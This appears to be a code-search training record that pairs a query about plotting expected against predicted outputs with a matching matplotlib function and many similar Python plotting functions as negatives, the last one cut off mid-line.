0.0
-1
Generate a side by side plot of expected and predicted
def plotExpectedPredicted(input, output, expected, label, fig, axes): n_batches = len(input) for batch in range(0, n_batches): input_2d = np.clip(np.reshape(input[batch], (28, 28)), 0, 1)#.astype(np.uint8) expected_2d = np.clip(np.reshape(expected[batch], (28, 28)), 0, 1)#.astype(np.uint8) output_2d = np.clip(np.reshape(output[batch], (28, 28)), 0, 1)#.astype(np.uint8) axes[batch, 0].imshow(input_2d, interpolation='nearest', cmap='gray') axes[batch, 0].set_title('Digit Label: {}'.format(label)) axes[batch, 0].set_xbound([0,28]) axes[batch,1] .imshow(expected_2d, interpolation='nearest', cmap='gray') axes[batch,1] .set_title('Digit Label: {}'.format(label)) axes[batch,1] .set_xbound([0,28]) axes[batch,2] .imshow(output_2d, interpolation='nearest', cmap='gray') axes[batch,2] .set_title('Digit Label: {}'.format(label)) axes[batch,2] .set_xbound([0,28])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def plot_result(data, gt_y, pred_y):\n assert data.shape[0] == gt_y.shape[0]\n assert data.shape[0] == pred_y.shape[0]\n\n plt.figure()\n\n plt.subplot(1, 2, 1)\n plt.title('Ground Truth', fontsize=18)\n\n for idx in range(data.shape[0]):\n if gt_y[idx] == 0:\n plt.plot(data[idx][0], data[idx][1], 'ro')\n else:\n plt.plot(data[idx][0], data[idx][1], 'bo')\n\n plt.subplot(1, 2, 2)\n plt.title('Prediction', fontsize=18)\n\n for idx in range(data.shape[0]):\n if pred_y[idx] == 0:\n plt.plot(data[idx][0], data[idx][1], 'ro')\n else:\n plt.plot(data[idx][0], data[idx][1], 'bo')\n\n plt.show()", "def plot_result(data, gt_y, pred_y):\n assert data.shape[0] == gt_y.shape[0]\n assert data.shape[0] == pred_y.shape[0]\n\n plt.figure()\n\n plt.subplot(1, 2, 1)\n plt.title('Ground Truth', fontsize=18)\n\n for idx in range(data.shape[0]):\n if gt_y[idx] == 0:\n plt.plot(data[idx][0], data[idx][1], 'ro')\n else:\n plt.plot(data[idx][0], data[idx][1], 'bo')\n\n plt.subplot(1, 2, 2)\n plt.title('Prediction', fontsize=18)\n\n for idx in range(data.shape[0]):\n if pred_y[idx] == 0:\n plt.plot(data[idx][0], data[idx][1], 'ro')\n else:\n plt.plot(data[idx][0], data[idx][1], 'bo')\n\n plt.show()", "def parity_plot(y_pred, y_act):\n\n fig = plt.figure(figsize=FIG_SIZE)\n plt.scatter(y_act, y_pred)\n plt.plot([y_act.min(), y_act.max()], [y_act.min(), y_act.max()],\n lw=4, color='r')\n plt.xlabel('Actual')\n plt.ylabel('Predicted')\n\n return fig", "def illustrate_prediction(model, test_data, test_target):\n selects = np.random.random_integers(0, len(test_data), 16)\n labels = test_target[selects]\n predicts = model.predict(test_data[selects])\n plt.figure()\n for k in range(16):\n plt.subplot(4, 4, k+1)\n plot_face(test_data[selects[k]])\n if predicts[k] == 1:\n plt.title('smile')\n else:\n plt.title('ugly')\n\n if predicts[k] != labels[k]:\n plt.plot([0, 24], [0, 24], 'r', linewidth=2)\n plt.plot([0, 24], [24, 0], 'r', linewidth=2)", "def visualize_pred(y_test, y_pred, test_seq, window_out, num_plots, num_win_ser, cols_y, col_idx):\n \n \n ser_idx = [i for i in range(0, len(y_test), num_win_ser)]\n if num_plots > len(ser_idx):\n print(\"Too many plots, reduce the mumber\")\n else:\n indx = ser_idx[0:num_plots]\n days = range(num_win_ser)\n for idx in indx:\n CR = test_seq[idx][0][0][3]\n pred = y_pred[idx : idx+num_win_ser, window_out -1, col_idx]\n true = y_test[idx : idx+num_win_ser, window_out -1, col_idx]\n \n plt.title(\"Y_True V/S Y_Pred, CR: \"+ str(CR))\n plt.xlabel('Days')\n plt.ylabel(cols_y[col_idx])\n \n plt.plot(days, pred, label = 'Pred')\n plt.plot(days, true, label = 'True')\n \n plt.legend()\n plt.show()", "def _plot_train_test_experiment(mtrain, mval, metric_name, isState):\n # axes\n f, axes = plt.subplots(2,2,figsize=(12,10))\n ltrain = _plot_experiment(mtrain, axes[:,0], metric_name, isTrain=True)\n lval = _plot_experiment(mval, axes[:,1], metric_name, isTrain=False)\n # title\n target = \"State\" if isState else \"Output\"\n f.suptitle(f\"{target} Errors\")\n f.tight_layout()\n return f, axes", "def visualize_test_results(X, y, pred, signnames):\n assert(X.shape[0] == 14)\n nrows = 2\n ncols = 7\n nlabels = 43\n fig, axes = plt.subplots(nrows = 2 * nrows, ncols = ncols, figsize = (10, 10))\n for i in range(nrows):\n for j in range(ncols):\n aximg = axes[2*i, j]\n axprobs = axes[2*i + 1, j]\n idx = i*ncols + j\n\n img = X[idx]\n aximg.imshow(img)\n aximg.set_axis_off()\n\n probs = pred[idx]\n label = y[idx]\n colors = probs.shape[0] * [\"red\"]\n colors[label] = \"green\"\n\n n_top = 5\n topindices = sorted(np.arange(probs.shape[0]), key = lambda i: probs[i])[-n_top:]\n topprobs = probs[topindices]\n topcolors = [colors[i] for i in topindices]\n ypos = np.arange(n_top)\n axprobs.barh(ypos, topprobs, color = topcolors)\n axprobs.set_yticks(ypos)\n for ypos, l in zip(ypos, topindices):\n axprobs.text(0.025, ypos, textwrap.fill(signnames[l], 20), fontsize = 6)\n axprobs.set_axis_off()\n fig.savefig(os.path.join(img_dir, \"test_results.png\"))", "def visualize_test(test_data_full, test_data, thetas):\n fig, ax = plt.subplots()\n ax.scatter(test_data_full[\"Weight\"], test_data_full[\"Height\"], color='blue')\n ax.plot(test_data_full[\"Weight\"], predict(test_data, thetas[-1]), color='red', linewidth=2)\n return fig", "def _plot_good_pred_whitout_reject(self, test: Set, title=None, fig_size=None):\r\n if fig_size is not None:\r\n fig = plt.figure(figsize=fig_size)\r\n else:\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111)\r\n goodclassified_index = []\r\n for idx_preds in range(self.preds.shape[1]):\r\n new_good_index = []\r\n for idx in range(self.preds.shape[0]):\r\n if test.labels[idx] == self.preds[idx, idx_preds]:\r\n new_good_index.append(idx)\r\n if new_good_index:\r\n ax.scatter(test.features[new_good_index, 0], self.features[new_good_index, 1],\r\n label='Good classified top{0}'.format(int(idx_preds + 1)))\r\n goodclassified_index += new_good_index\r\n misclassified = [idx for idx in range(self.preds.shape[0]) if idx not in goodclassified_index]\r\n if misclassified:\r\n ax.scatter(test.features[misclassified, 0], test.features[misclassified, 1],\r\n label='Misclassified', marker='x', c='red')\r\n box = ax.get_position()\r\n ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])\r\n # Put a legend to the right of the current axis\r\n ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\r\n if title is not None:\r\n ax.set_title(title)\r\n plt.show()", "def plot_predictions(net, x_train, y_train, idx_train, x_val, y_val, idx_val):\n fig, (ax1, ax2) = plt.subplots(nrows=2, figsize=(20, 30))\n pred1 = net.predict(x_val, batch_size=batch_size)\n # print(\"pred1.shape:\", pred1.shape)\n ax1.plot(idx_val, y_val, label=\"Actual Data\", marker=\"+\")\n ax1.plot(idx_val, pred1, label=\"Prediction\", marker=\"o\")\n # ax1.set_ylim(-0.1, 1.1)\n ax1.set_xlabel(\"Year\")\n ax1.set_ylabel(\"Sunspot Numbers\")\n ax1.legend()\n ax1.set_title(\"Predicted vs Actual Validation Data\")\n\n pred2 = net.predict(x_train, batch_size=batch_size)\n # print(\"pred2.shape:\", pred2.shape)\n ax2.plot(idx_train, y_train, label=\"Actual Data\", marker=\"+\")\n ax2.plot(idx_train, pred2, label=\"Prediction\", marker=\"o\")\n # ax2.set_ylim(-0.1, 1.1)\n ax2.set_xlabel(\"Year\")\n ax2.set_ylabel(\"Sunspot Numbers\")\n ax2.legend()\n ax2.set_title(\"Predicted vs Actual Training Data\")\n\n plt.tight_layout()\n\n filename = \"img/\"\n filename += datetime.now().strftime(\"%y%m%d_%H%M\")\n filename += \"_predicted_vs_actual_data.png\"\n fig.savefig(filename, format=\"png\")", "def plot_predictions(self):\n\n plt.title(\"Targets vs. Predictions\")\n plt.plot(self.T, label=\"Targets\")\n plt.plot(self.Y, label=\"Predictions\")\n plt.xlabel(\"Sample number\")\n plt.legend()\n plt.show()", "def plot_actual_vs_predicted_by_equations(df, x_variable, y_variables, plot_title):\n #Plot results\n df.plot(x=x_variable, y=y_variables, title=plot_title)\n plt.show()", "def plot_observed_predictions(self):\n \n # Plot of X vs Y\n fig = plt.figure(figsize=(15,5))\n plt.subplot(1,3,1) \n for k in self.phd_filter['estimated_positions'].keys():\n plt.plot(self.phd_filter['estimated_positions'][k][0], self.phd_filter['estimated_positions'][k][1], 'bx')\n plt.xlabel(\"X\",fontsize=20)\n plt.ylabel(\"Y\",fontsize=20)\n \n # Plot of time vs X\n plt.subplot(1,3,2)\n for k in self.phd_filter['estimated_positions'].keys(): \n plt.plot(k*np.ones(self.phd_filter['estimated_positions'][k].shape[1]), self.phd_filter['estimated_positions'][k][0], 'bx')\n plt.xlabel(\"time\",fontsize=20)\n plt.ylabel(\"X\",fontsize=20)\n plt.xlim(0,self.n_time_steps+1)\n\n # Plot of time vs Y\n plt.subplot(1,3,3)\n for k in self.phd_filter['estimated_positions'].keys():\n plt.plot(k*np.ones(self.phd_filter['estimated_positions'][k].shape[1]), self.phd_filter['estimated_positions'][k][1], 'bx')\n plt.xlabel(\"time\",fontsize=20)\n plt.ylabel(\"Y\",fontsize=20)\n plt.xlim(0,self.n_time_steps+1)\n plt.show();", "def plot_results(self, predictions: list):\n fig, ax = plt.subplots()\n cm = confusion_matrix(self.test[1], predictions)\n conf = confusion_matrix(self.test[1], predictions).ravel()\n nbr_labels = len(set(self.test[1]))\n cm = conf.reshape(nbr_labels, nbr_labels)\n sns.heatmap(cm, annot=True, fmt=\"d\", cmap=\"Spectral\")\n ax.set_xlabel(\"predicted label\")\n ax.set_ylabel(\"true label\")\n fig.savefig(\"confusion_matrix\")\n\n fig, ax = plt.subplots()\n x = self.train[0] + self.test[0]\n y = self.train[1] + self.test[1]\n x = [i[0] for i in x]\n y = [i for i in y]\n results = pd.DataFrame({\"polarity strength\": x, \"true label\": y})\n sns.boxplot(data=results, x=\"true label\", y=\"polarity strength\")\n fig.savefig(\"boxplot\")", "def plot_actual_predicted(self):\n predicted = [self.f(x, self.coefficients) for x in self.x_values]\n\n plt.scatter(self.x_values, self.y_values, label = \"Actual data\", c = 'b')\n plt.plot(self.x_values, predicted, label = \"Predicted data\", c = 'r')\n plt.title(f\"Graph of Prediected and Actual data points.\")\n plt.xlabel('x-axis')\n plt.ylabel('y-axis')\n plt.legend()\n plt.show()", "def analysis_plot(predictions, ys):\n fig, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(20, 5))\n\n residuals = ys - predictions\n\n # Plot 1 - Predicted vs Actual\n sns.scatterplot(predictions, ys, ax=ax1)\n ax1.set_title('Predicted vs Actual', fontsize=20)\n ax1.set(xlabel='Predicted Ys', ylabel='Actual Ys')\n\n # Plot 2 - Residuals PLot (predicted vs residuals)\n sns.scatterplot(predictions, residuals, ax=ax2)\n ax2.set_title('Residuals Plot', fontsize=20)\n ax2.set(xlabel='Predicted Ys', ylabel='Residuals')\n\n # Plot 3 - QQ Plot\n sm.qqplot(residuals, ax=ax3, line='s')\n ax3.set_title('QQ Plot- Distribution of Residuals', fontsize=20)\n\n plt.show();", "def plot_results(\n train_data: tuple[Tensor, Tensor],\n test_data: tuple[Tensor, Tensor],\n correct_class: Tensor\n):\n #fig, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(21,7), subplot_kw=dict(box_aspect=1))\n fig1, (ax1, ax2) = plt.subplots(1, 2, figsize=(14,7), subplot_kw=dict(box_aspect=1))\n fig2, ax3 = plt.subplots(figsize=(7,7), subplot_kw=dict(box_aspect=1))\n ax1.set_title('Training data')\n plot_dataset(train_data, ax1)\n\n ax2.set_title('Test data')\n plot_dataset(test_data, ax2)\n\n ax3.set_title('Test prediction correctness')\n plot_dataset((test_data[0], correct_class.int()), ax3, cmap={0: '#ff0000', 1: '#00ff00'})\n \n fig1.savefig('plots/datasets')\n fig2.savefig('plots/predictions')\n plt.show()", "def generate_prediction_plots(y_true: np.ndarray,\n y_pred: np.ndarray,\n mses: np.ndarray,\n n_agents: int,\n n_options: int,\n save_path: Optional[Path] = None) -> None:\n n_to_plot = 10\n\n fig, axes = plt.subplots(n_to_plot * n_options, 2, figsize=(20, 60))\n trues, preds = select_predictions(mode='random', n_to_sample=n_to_plot, y_true=y_true, y_pred=y_pred)\n plot_preds(axes=axes, y_true=trues, y_pred=preds, n_agents=n_agents, n_options=n_options)\n plt.tight_layout()\n\n if save_path is not None:\n plt.savefig(save_path.joinpath(\"random_predictions.png\"), dpi=150)\n\n fig, axes = plt.subplots(n_to_plot * n_options, 2, figsize=(20, 60))\n trues, preds = select_predictions(mode='worst',\n n_to_sample=n_to_plot,\n y_true=y_true,\n y_pred=y_pred,\n mses=mses)\n plot_preds(axes=axes, y_true=trues, y_pred=preds, n_agents=n_agents, n_options=n_options)\n plt.tight_layout()\n\n if save_path is not None:\n plt.savefig(save_path.joinpath(\"worst_predictions.png\"), dpi=150)\n else:\n plt.show()\n\n plt.close('all')", "def evaluate_model_with_test_data(model, generator, iterations_count, label_name=''):\n y_predicted, y_etalon = [], []\n for i in range(0,iterations_count):\n x,y = next(generator)\n y_result = model.predict(x, y.shape[0])\n y_predicted.extend(y_result)\n y_etalon.extend(y)\n\n\n # corner1, bridge start, b_end, Big Left, BL-end, Sharp Right, end, Last left, end\n way_points = [69, 183, 276, 309, 348, 410, 456, 514, 612]\n wp_total = 819\n plt_pt_length = len(y_etalon)\n\n\n plt.figure(figsize=(24,6))\n plt.plot(y_predicted, 'r-')\n plt.plot(y_etalon, 'g--')\n plt.title('Predicted angle vs sample')\n plt.ylabel('Angle')\n plt.xlabel('Sample #')\n plt.legend(['Predicted', 'Initial'], loc='upper right')\n\n #add vertical lines to define critical regions on the plot\n for p in way_points:\n px = p / wp_total * plt_pt_length\n plt.axvline(px, ls='--', color='k')\n\n plt.gca().invert_yaxis()\n\n lbl = ''\n if len(label_name):\n lbl = '-' + label_name\n plt.savefig('test_vs_recorded_angle{}.png'.format(lbl), bbox_inches='tight')", "def plot_true_predicted(train_test_sets, radii_test_RF,\n radii_test_output_error):\n\n X_train, X_test, y_train, y_test = train_test_sets\n plt.figure()\n plt.errorbar(radii_test_RF, y_test.values,\n xerr=radii_test_output_error,\n fmt='.', c='C1', elinewidth=0.5,\n label='Random forest')\n # 1:1 line and labels\n plt.plot(np.sort(y_test.values), np.sort(y_test.values), 'k-', lw=0.25)\n\n plt.ylabel(r'True radius ($R_\\oplus$)')\n plt.ylabel(r'Predicted radius ($R_\\oplus$)')\n plt.legend(loc='lower right')\n return None", "def show_predictions(model, test_set, val_set, image_guess, img_res, data='OSNR', GRAY=True):\n \n ## Uses model to predict some amount of images\n predict = model.predict_classes(test_set, batch_size=5, verbose=1)\n \n ## Initialises variables for loop\n correctly_guessed = 0\n\n ## Defines figure dimensions\n fig = plt.figure(figsize=(20,30))\n\n ## Begins loop to find correct predictions and relay results to user\n ## Searches through the prediction array and compares it to the actual array.\n ## Displays image with the prediction and answer on the title\n for i in range(image_guess):\n correct = False\n actual = np.argmax(val_set[i])\n\n if predict[i] == actual:\n correctly_guessed += 1\n correct = True\n\n plt.subplot(6,3,i+1)\n fig.subplots_adjust(left=0.01,\n right=0.7,\n bottom=0.1,\n top=1.2,\n wspace=0.5,\n hspace=0.2\n )\n if GRAY == False:\n plt.imshow(test_set[i].reshape(img_res,img_res,3))\n else:\n plt.imshow(test_set[i].reshape(img_res,img_res), cmap='gray')\n\n if correct == True:\n if data == 'disp':\n plt.title('Correct! \\nPrediction = {}ps/nm Truth = {}ps/nm'\n .format((10+10*predict[i]), (10+10*(actual))), fontsize=15)\n \n if data == 'disp-short':\n plt.title('Correct! \\nPrediction = {} ~ {}ps/nm Truth = {} ~{}ps/nm'\n .format(100*(predict[i]), (100+100*predict[i]), 100*(actual), (100+100*(actual)), fontsize=15))\n \n if data == 'OSNR':\n plt.title('Correct! \\nPrediction = {}dB Truth = {}dB'\n .format((12+0.5*predict[i]), (12+0.5*(actual))), fontsize=15)\n \n \n else:\n if data == 'disp':\n plt.title('\\nPrediction = {}ps/nm Truth = {}ps/nm'\n .format((10+10*predict[i]), (10+10*(actual))), fontsize=15)\n \n if data == 'disp-short':\n plt.title('\\nPrediction = {} ~ {}ps/nm Truth = {} ~{}ps/nm'\n .format(100*(predict[i]), (100+100*predict[i]), 100*(actual), (100+100*(actual)), fontsize=15))\n \n if data == 'OSNR':\n plt.title('\\nPrediction = {}dB Truth = {}dB'\n .format((12+0.5*predict[i]), (12+0.5*(actual))), fontsize=15)\n\n ## Returns amount of predictions that were correct\n print('Correctly guessed = ', correctly_guessed)\n print('Inorrectly guessed = ', (image_guess-correctly_guessed))", "def visualizePredictions(testData,knn_predictions):\r\n testData.visualize.scatterPlot('Petal length','Petal width')\r\n testData.dataDict[testData.reference] = knn_predictions\r\n testData.visualize.scatterPlot('Petal length','Petal width')\r\n\r\n pass", "def plot_true_predictions(self):\n \n if self.data_generated:\n \n # Choosing a different color for each target\n n_targets = len(self.true_data['targets'])\n cmap = plt.get_cmap('gnuplot')\n colors = [cmap(i) for i in np.linspace(0, 0.9, n_targets)]\n\n # Plot of the ground truth X vs Y\n fig = plt.figure(figsize=(15,5))\n plt.subplot(1,3,1)\n for k in self.phd_filter['estimated_positions'].keys():\n plt.plot(self.phd_filter['estimated_positions'][k][0], self.phd_filter['estimated_positions'][k][1], 'bx')\n for i in self.true_data['targets']:\n plt.plot(self.true_data['all_x'][i][:,0],self.true_data['all_x'][i][:,2],\\\n '-',label=\"true track %s\" %i,color=colors[i])\n plt.xlabel(\"X\",fontsize=20)\n plt.ylabel(\"Y\",fontsize=20)\n #plt.legend(loc='best')\n\n\n # Plot of the ground truth time vs X\n plt.subplot(1,3,2)\n for k in self.phd_filter['estimated_positions'].keys(): \n plt.plot(k*np.ones(self.phd_filter['estimated_positions'][k].shape[1]), self.phd_filter['estimated_positions'][k][0], 'bx')\n for i in self.true_data['targets']:\n plt.plot(self.timeline[i],self.true_data['all_x'][i][:,0],\\\n '-',label=\"true track %s\" %i,color=colors[i])\n plt.xlabel(\"time\",fontsize=20)\n plt.ylabel(\"X\",fontsize=20)\n plt.xlim(0,self.n_time_steps+1)\n #plt.legend(loc='upper right')\n\n # Plot of the ground truth time vs Y\n plt.subplot(1,3,3)\n for k in self.phd_filter['estimated_positions'].keys():\n plt.plot(k*np.ones(self.phd_filter['estimated_positions'][k].shape[1]), self.phd_filter['estimated_positions'][k][1], 'bx')\n for i in self.true_data['targets']:\n plt.plot(self.timeline[i],self.true_data['all_x'][i][:,2],\\\n '-',label=\"true track %s\" %i,color=colors[i])\n plt.xlabel(\"time\",fontsize=20)\n plt.ylabel(\"Y\",fontsize=20)\n plt.xlim(0,self.n_time_steps+1)\n #plt.legend(loc='upper right')\n plt.show();\n\n elif self.data_given:\n raise ValueError(\"Cannot plot true positions if y_obs is given because the true x are not known.\")\n else:\n raise ValueError(\"No data to plot !\")", "def plot_results(infer_images, inference_predicted_class, inference_predictions, class_names=['plants', 'water']):\n plt.style.use(['dark_background', 'bmh'])\n rc('figure', figsize=(8, 8), max_open_warning=False)\n rc('axes', facecolor='none')\n plt.figure(figsize=(15, 15))\n\n for i, (infer_img, _) in enumerate(infer_images.take(10)):\n ax = plt.subplot(5, 2, i + 1)\n plt.imshow(infer_img.numpy()/255)\n\n # Find the predicted class from predictions\n m = \"Predicted: {}, {:.2f}%\".format(\n class_names[inference_predicted_class[i]], inference_predictions[i]*100)\n plt.title(m)\n plt.axis(\"off\")\n plt.show()", "def plotPredictedError():\n\tglobal normalized\n\n\twarmthPred = []\n\twarmthObserved = []\n\tcompPred = []\n\tcompObserved = []\n\tSStotalWarmth = 0\n\tSSresWarmth = 0\n\tSStotalComp = 0\n\tSSresComp = 0\n\tkeys = parser.getMappings(normalized)[0].keys()\n\tfor key in keys:\n\n\t\tif \"_\" in key:\n\t\t\twarmthAxis, compAxis = getPlotData(key)\n\t\t\twarmthPred.append(warmthAxis[3])\n\t\t\twarmthObserved.append(warmthAxis[2])\n\t\t\tcompPred.append(compAxis[3])\n\t\t\tcompObserved.append(compAxis[2])\n\n\tmeanObservedWarmth = np.mean(warmthObserved)\n\tmeanObservedComp = np.mean(compObserved)\n\tfor i in range(0, len(warmthObserved)):\n\t\tSStotalWarmth += (warmthObserved[i] - meanObservedWarmth)**2\n\t\tSSresWarmth += (warmthObserved[i] - warmthPred[i])**2\n\t\tSStotalComp += (compObserved[i] - meanObservedComp)**2\n\t\tSSresComp += (compObserved[i] - compPred[i])**2\n\n\n\tplt.axis([0, 100, 0, 100])\n\tfig = plt.figure(1)\n\tax = fig.add_subplot(111)\n\tslope, intercept, r_value, p_value, std_err = stats.linregress(warmthObserved, warmthPred)\n\tprint(r_value**2)\n\ttext = ax.text(60, 20, \"R^2 value: \" + str(r_value**2) , \\\n fontsize = 12, color = 'black')\n\tplt.title(\"Observed vs Predicted Warmth\")\n\tplt.ylabel(\"Predicted Value\")\n\tplt.xlabel(\"Observed Value\")\n\tplt.scatter(warmthObserved, warmthPred)\n\tplt.plot([0,100], [0,100])\n\tplt.show()\n\n\tfig = plt.figure(1)\n\tax = fig.add_subplot(111)\n\tslope, intercept, r_value, p_value, std_err = stats.linregress(compObserved, compPred)\n\tprint(r_value**2)\n\ttext = ax.text(60, 20, \"R^2 value: \" + str(r_value**2) , \\\n fontsize = 12, color = 'black')\n\tplt.axis([0, 100, 0, 100])\n\tplt.title(\"Observed vs Predicted Competence\")\n\tplt.ylabel(\"Predicted Value\")\n\tplt.xlabel(\"Observed Value\")\n\tplt.scatter(compObserved, compPred)\n\tplt.plot([0,100], [0,100])\n\tplt.show()", "def plot_observed_predicted(y_data, y_predict, ols_line=False, model_fit=None, figsize=(15, 10), save=False, end_name_fig='', folder='Charts'): \r\n\r\n end_name_fig = end_name_fig + '_' if end_name_fig is not None else ''\r\n\r\n fig, ax = plt.subplots(figsize=figsize)\r\n ax.scatter(y_data, y_predict)\r\n \r\n if ols_line == False:\r\n ax.plot([y_data.min(), y_data.max()], [y_data.min(), y_data.max()], 'k--', lw=4)\r\n\r\n else:\r\n line_fit = sm.OLS(y_data, sm.add_constant(y_predict, prepend=True)).fit()\r\n abline_plot(model_results=line_fit, ax=ax)\r\n\r\n ax.set_title('Predicted vs Observed')\r\n ax.set_ylabel('Observed values')\r\n ax.set_xlabel('Predicted values')\r\n\r\n if save == True:\r\n plt.savefig(folder + '/predict_observed_' + end_name_fig + '.png')\r\n\r\n if model_fit is not None:\r\n \r\n fig, ax = plt.subplots(figsize=figsize)\r\n ax.scatter(y_predict, model_fit.resid_pearson)\r\n ax.hlines(0, 0, 1)\r\n ax.set_xlim(0, 1)\r\n ax.set_title('Residual Dependence Plot')\r\n ax.set_ylabel('Pearson Residuals')\r\n ax.set_xlabel('Fitted values') \r\n\r\n if save == True:\r\n plt.savefig(folder + '/pearson_residuals_' + end_name_fig + '.png')\r\n\r\n\r\n fig, ax = plt.subplots(figsize=figsize)\r\n res_dev_residuals = model_fit.resid_deviance.copy()\r\n res_dev_residuals_std = stats.zscore(res_dev_residuals)\r\n ax.hist(res_dev_residuals_std, bins=25)\r\n ax.set_title('Histogram of standardized deviance residuals')\r\n\r\n if save == True:\r\n plt.savefig(folder + '/standard_deviance_residuals_' + end_name_fig + '.png')\r\n\r\n graphics.gofplots.qqplot(res_dev_residuals, line='r')\r\n\r\n if save == True:\r\n plt.savefig(folder + '/gofplot_' + end_name_fig + '.png')", "def generate_results(self, test_no, test_dict):\n g_s = gridspec.GridSpec(4, 2, wspace=0.2, hspace=1.5)\n fig = plt.figure(figsize=(20, 6))\n fig.suptitle('Experiment Results', y=0.93)\n\n x_val = np.arange(1, self.iters+1)\n\n ax1 = plt.subplot(g_s[0:3, :1], label = 'Mean Rewards')\n ax1.set_title('Mean Rewards')\n ax1.scatter(x_val, self.mean_rewards, s=5)\n ax1.set(xlabel='Iteration', ylabel='Mean Reward')\n\n ax2 = plt.subplot(g_s[0:3, 1:])\n ax2.scatter(x_val, self.sub_goals, s=5, label='Sub-optimal Goal')\n ax2.scatter(x_val, self.opt_goals, s=5, label='Optimal Goal')\n ax2.set_title('Goal Success Percentage by Type')\n ax2.set(xlabel='Iteration', ylabel='Success Percentage (%)')\n ax2.legend(loc=0)\n\n cells = list(test_dict.values())\n cells = [str(i) for i in cells]\n columns = list(test_dict.keys())\n ax3 = plt.subplot(g_s[3:, :])\n ax3.axis('off')\n ax3.table(cellText=[cells], colLabels=columns, loc='center', cellLoc='center')\n\n plt.savefig(f'results/charts/Test_{test_no}.png', bbox_inches='tight')", "def plot_regression_results(ax, y_true, y_pred, title, scores, elapsed_time):\n ax.plot([y_true.min(), y_true.max()],\n [y_true.min(), y_true.max()],\n '--r', linewidth=2)\n ax.scatter(y_true, y_pred, alpha=0.2)\n\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.get_xaxis().tick_bottom()\n ax.get_yaxis().tick_left()\n ax.spines['left'].set_position(('outward', 10))\n ax.spines['bottom'].set_position(('outward', 10))\n ax.set_xlim([y_true.min(), y_true.max()])\n ax.set_ylim([y_true.min(), y_true.max()])\n ax.set_xlabel('Measured')\n ax.set_ylabel('Predicted')\n extra = plt.Rectangle((0, 0), 0, 0, fc=\"w\", fill=False,\n edgecolor='none', linewidth=0)\n ax.legend([extra], [scores], loc='upper left')\n title = title + '\\n Evaluation in {:.2f} seconds'.format(elapsed_time)\n ax.set_title(title)", "def plot_pred(y, yhat, name, output_dir):\n ax = pd.DataFrame(y, columns=[\"y%s\" % LOOK_AHEAD]).plot(figsize=(15, 10))\n pd.DataFrame(yhat, columns=[\"yhat%s\" % LOOK_AHEAD]).plot(ax=ax)\n plt.title(\"%s\" % name)\n plt.tight_layout()\n plt.savefig(f\"{output_dir / name}.png\")\n\n pd.DataFrame(y-yhat, columns=[f\"yhat {LOOK_AHEAD}\"]).plot(figsize=(15, 10))\n plt.title(\"diff-%s\" % name)\n plt.tight_layout()\n plt.savefig(f\"{output_dir / name}-diff.png\")", "def _plot_model_pred_vs_obs(self, ax):\n\n res = self._model.fit()\n\n ax.plot(self._model.endog, res.fittedvalues, '.', label='Observation')\n\n x_lim = ax.get_xlim()\n\n ax.plot(x_lim, x_lim, 'k:', label='1:1 line')\n\n x_label = 'Observed ' + self._model.endog_names\n y_label = 'Predicted ' + self._model.endog_names\n\n ax.set_xlabel(x_label)\n ax.set_ylabel(y_label)\n\n ax.legend(loc='best', numpoints=1)", "def plot_prediction(self, img, probs, classes):\n\n # Convert results to dataframe for plotting\n result = pd.DataFrame({\"p\": probs}, index=classes)\n\n # Show the image\n fig = plt.figure(figsize=(16, 5))\n ax = plt.subplot(1, 2, 1)\n ax.imshow(img)\n\n # Set title to be the actual class\n ax.set_title(\"\", size=20)\n\n ax = plt.subplot(1, 2, 2)\n # Plot a bar plot of predictions\n result.sort_values(\"p\")[\"p\"].plot.barh(color=\"blue\", edgecolor=\"k\", ax=ax)\n plt.xlabel(\"Predicted Probability\")\n plt.tight_layout()\n\n return fig", "def plot_test(y_test, y_pred, title = None, xlabel = 'Measured $Y = \\log_2(MIC)$', ylabel = 'Predicted $Y = \\log_2(MIC)$', legend = ['Ideal', 'Result'], groups = None):\n \n fig, ax = plt.subplots(1,1)\n fig.set_figheight(5)\n fig.set_figwidth(5)\n if groups is not None:\n groups_obj = pd.concat([y_test,y_pred], axis=1).groupby(np.array(groups))\n cmap=plt.get_cmap('tab10')\n for name, group in groups_obj:\n # Works only for groups with numeric names that are max cmap length:\n ax.plot(group.iloc[:,0], group.iloc[:,1], marker=\"o\", linestyle=\"\", label=int(name), color = cmap.colors[int(name)])\n ax.legend()\n else:\n ax.scatter(y_test,y_pred, color = 'red')\n ax_max = 10\n if np.max(y_test.values)>ax_max:\n ax_max = np.max(y_test).values\n ax_min = 0\n if np.min(y_test.values)<ax_min:\n ax_min = np.min(y_test.values)\n ax.plot([ax_min, ax_max], [ax_min, ax_max], '--', color='black')\n ax.set_aspect('equal', 'box')\n plt.title(title)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n #plt.savefig(title+'.pdf')\n plt.savefig(title+'.svg')\n #plt.savefig(title+'.png')#, dpi=600)\n #plt.show()", "def plot_pred(xy, y_prime, N=10, groundtruth=True):\n \n fig,ax = plt.subplots()\n pred_seq = y_prime.shape[2]\n obs_seq = xy.shape[1] - pred_seq\n \n if groundtruth:\n for i in range(N):\n # plot observation\n ax.plot(xy[i, :obs_seq, 2], xy[i, :obs_seq, 3], color='k')\n # plot ground truth\n ax.plot(xy[i, obs_seq-1:, 2], xy[i, obs_seq-1:, 3], color='r')\n for j, pred in enumerate(y_prime[i]):\n # concate the first step for visulization purpose\n pred = np.concatenate((xy[i, obs_seq-1:obs_seq, 2:4], pred), axis=0) \n ax.plot(pred[:, 0], pred[:, 1], color='b') \n else:\n x = xy\n obs_seq = x.shape[1] \n for i in range(N):\n # plot observation\n ax.plot(x[i, :, 2], x[i, :, 3], color='k')\n for j, pred in enumerate(y_prime[i]):\n # concate the first step for visulization\n pred = np.concatenate((x[i, obs_seq-1:obs_seq, 2:4], pred), axis=0) \n ax.plot(pred[:, 0], pred[:, 1], color='b') \n ax.set_aspect(\"equal\")\n plt.show()\n plt.gcf().clear()\n plt.close()", "def plot_comparison(step_test_data, model, inputs, outputs, start_time, end_time, plt_input=False, scale_plt=False):\n \n val_data = step_test_data.loc[start_time:end_time]\n val_data.columns = [col[0] for col in val_data.columns]\n \n Time = val_data.index\n u = val_data[inputs].to_numpy().T\n y = 